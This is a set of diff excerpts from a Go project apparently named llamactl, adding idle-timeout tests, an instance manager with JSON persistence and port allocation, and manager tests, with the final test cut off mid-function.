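checkAllTimeouts appears in the commit log but not in this diff; a minimal sketch of such a sweep, under the assumption that the manager holds the instance map shown later in pkg/manager (sweepIdleInstances is a hypothetical name):

// Hypothetical sweep: stops instances whose idle timeout has elapsed
// according to ShouldTimeout.
func (im *instanceManager) sweepIdleInstances() {
	im.mu.RLock()
	defer im.mu.RUnlock()
	for name, inst := range im.instances {
		if inst.ShouldTimeout() {
			log.Printf("Instance %s exceeded its idle timeout, stopping", name)
			go inst.Stop() // stop asynchronously, outside the read lock's critical path
		}
	}
}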

View File

@@ -0,0 +1,195 @@
package instance_test
import (
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
idleTimeout *int
}{
{"nil timeout", nil},
{"zero timeout", testutil.IntPtr(0)},
{"negative timeout", testutil.IntPtr(-5)},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Simulate running state
inst.Running = true
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
}
})
}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst.Running = true
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst.Running = true
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
inputTimeout *int
expectedTimeout int
}{
{"default value when nil", nil, 0},
{"positive value", testutil.IntPtr(10), 10},
{"zero value", testutil.IntPtr(0), 0},
{"negative value gets corrected", testutil.IntPtr(-5), 0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
}
})
}
}

View File

@@ -1,442 +0,0 @@
package llamactl_test
import (
"encoding/json"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstance(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &llamactl.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Test with invalid negative values
invalidMaxRestarts := -5
invalidRestartDelay := -10
options := &llamactl.CreateInstanceOptions{
MaxRestarts: &invalidMaxRestarts,
RestartDelay: &invalidRestartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that negative values were corrected to 0
if opts.MaxRestarts == nil || *opts.MaxRestarts != 0 {
t.Errorf("Expected MaxRestarts to be corrected to 0, got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 0 {
t.Errorf("Expected RestartDelay to be corrected to 0, got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
// Update options
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
instance.SetOptions(newOptions)
opts := instance.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestSetOptions_NilOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
originalOptions := instance.GetOptions()
// Try to set nil options
instance.SetOptions(nil)
// Options should remain unchanged
currentOptions := instance.GetOptions()
if currentOptions.Model != originalOptions.Model {
t.Error("Options should not change when setting nil options")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
// Get proxy for the first time
proxy1, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]interface{}
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if !instance.Running {
t.Error("Expected running to be true")
}
opts := instance.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestUnmarshalJSON_PartialOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false,
"options": {
"model": "/path/to/model.gguf"
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
// Note: Defaults are NOT applied during unmarshaling
// They should only be applied by NewInstance or SetOptions
if opts.AutoRestart != nil {
t.Error("Expected AutoRestart to be nil (no defaults applied during unmarshal)")
}
}
func TestUnmarshalJSON_NoOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("Expected running to be false")
}
opts := instance.GetOptions()
if opts != nil {
t.Error("Expected options to be nil when not provided in JSON")
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "nil values",
maxRestarts: nil,
restartDelay: nil,
expectedMax: 0, // Should remain nil, but we can't easily test nil in this structure
expectedDelay: 0,
},
{
name: "valid positive values",
maxRestarts: intPtr(10),
restartDelay: intPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: intPtr(0),
restartDelay: intPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: intPtr(-5),
restartDelay: intPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test", globalSettings, options)
opts := instance.GetOptions()
if tt.maxRestarts != nil {
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
}
if tt.restartDelay != nil {
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
}
})
}
}

pkg/manager/manager.go (new file, +272 lines)
View File

@@ -0,0 +1,272 @@
package manager
import (
"encoding/json"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*instance.Process, error)
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
GetInstance(name string) (*instance.Process, error)
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
StopInstance(name string) (*instance.Process, error)
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
ports map[int]bool
instancesConfig config.InstancesConfig
// Timeout checker
timeoutChecker *time.Ticker
shutdownChan chan struct{}
shutdownDone chan struct{}
isShutdown bool
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
}
// Load existing instances from disk
if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err)
}
// Start the timeout checker goroutine after initialization is complete
go func() {
defer close(im.shutdownDone)
for {
select {
case <-im.timeoutChecker.C:
im.checkAllTimeouts()
case <-im.shutdownChan:
return // Exit goroutine on shutdown
}
}
}()
return im
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}
// persistInstance saves an instance to its JSON file
func (im *instanceManager) persistInstance(instance *instance.Process) error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
tempPath := instancePath + ".tmp"
// Serialize instance to JSON
jsonData, err := json.MarshalIndent(instance, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
}
// Write to temporary file first
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
}
// Atomic rename
if err := os.Rename(tempPath, instancePath); err != nil {
os.Remove(tempPath) // Clean up temp file
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
}
return nil
}
func (im *instanceManager) Shutdown() {
im.mu.Lock()
defer im.mu.Unlock()
// Check if already shutdown
if im.isShutdown {
return
}
im.isShutdown = true
// Signal the timeout checker to stop
close(im.shutdownChan)
// Release lock temporarily to wait for goroutine
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Reacquire lock
im.mu.Lock()
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
var wg sync.WaitGroup
wg.Add(len(im.instances))
for name, inst := range im.instances {
if !inst.Running {
wg.Done() // If instance is not running, just mark it as done
continue
}
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
// Attempt to stop the instance gracefully
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
}
}(name, inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
}
// loadInstances restores all instances from disk
func (im *instanceManager) loadInstances() error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
// Check if instances directory exists
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
return nil // No instances directory, start fresh
}
// Read all JSON files from instances directory
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
if err != nil {
return fmt.Errorf("failed to read instances directory: %w", err)
}
loadedCount := 0
for _, file := range files {
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
continue
}
instanceName := strings.TrimSuffix(file.Name(), ".json")
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
if err := im.loadInstance(instanceName, instancePath); err != nil {
log.Printf("Failed to load instance %s: %v", instanceName, err)
continue
}
loadedCount++
}
if loadedCount > 0 {
log.Printf("Loaded %d instances from persistence", loadedCount)
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
}
return nil
}
// loadInstance loads a single instance from its JSON file
func (im *instanceManager) loadInstance(name, path string) error {
data, err := os.ReadFile(path)
if err != nil {
return fmt.Errorf("failed to read instance file: %w", err)
}
var persistedInstance instance.Process
if err := json.Unmarshal(data, &persistedInstance); err != nil {
return fmt.Errorf("failed to unmarshal instance: %w", err)
}
// Validate the instance name matches the filename
if persistedInstance.Name != name {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
// Create a new instance via NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions())
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.Running = persistedInstance.Running
// Check for port conflicts and add to maps
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 {
port := inst.GetOptions().Port
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
}
im.ports[port] = true
}
im.instances[name] = inst
return nil
}
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
if inst.Running && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
}
}
im.mu.RUnlock()
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
inst.Running = false
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
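
A minimal usage sketch of the new manager package (assumed wiring; the actual server bootstrap lives elsewhere in the repo):

package main

import (
	"llamactl/pkg/config"
	"llamactl/pkg/manager"
)

func main() {
	cfg := config.InstancesConfig{
		PortRange:            [2]int{8000, 9000},
		TimeoutCheckInterval: 5, // minutes between idle-timeout checks
	}
	mgr := manager.NewInstanceManager(cfg)
	// Shutdown stops the timeout checker and gracefully stops all
	// running instances before exit.
	defer mgr.Shutdown()

	// ... wire HTTP handlers that call mgr.CreateInstance,
	// mgr.StartInstance, mgr.StopInstance, etc.
}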

pkg/manager/manager_test.go (new file, +509 lines)
View File

@@ -0,0 +1,509 @@
package manager_test
import (
"fmt"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"os"
"path/filepath"
"strings"
"sync"
"testing"
"time"
)
func TestNewInstanceManager(t *testing.T) {
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.Running {
t.Error("New instance should not be running")
}
if inst.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetOptions().Port
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestPersistence(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
TimeoutCheckInterval: 5,
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(cfg)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager1.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Check that JSON file was created
expectedPath := filepath.Join(tempDir, "test-instance.json")
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Errorf("Expected persistence file %s to exist", expectedPath)
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(cfg)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Fatalf("Expected 1 loaded instance, got %d", len(instances))
}
if instances[0].Name != "test-instance" {
t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
}
// Test port map populated from loaded instances (port conflict should be detected)
_, err = manager2.CreateInstance("new-instance", options) // Same port
if err == nil || !strings.Contains(err.Error(), "port") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test file deletion on instance deletion
err = manager2.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
t.Error("Expected persistence file to be deleted")
}
}
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
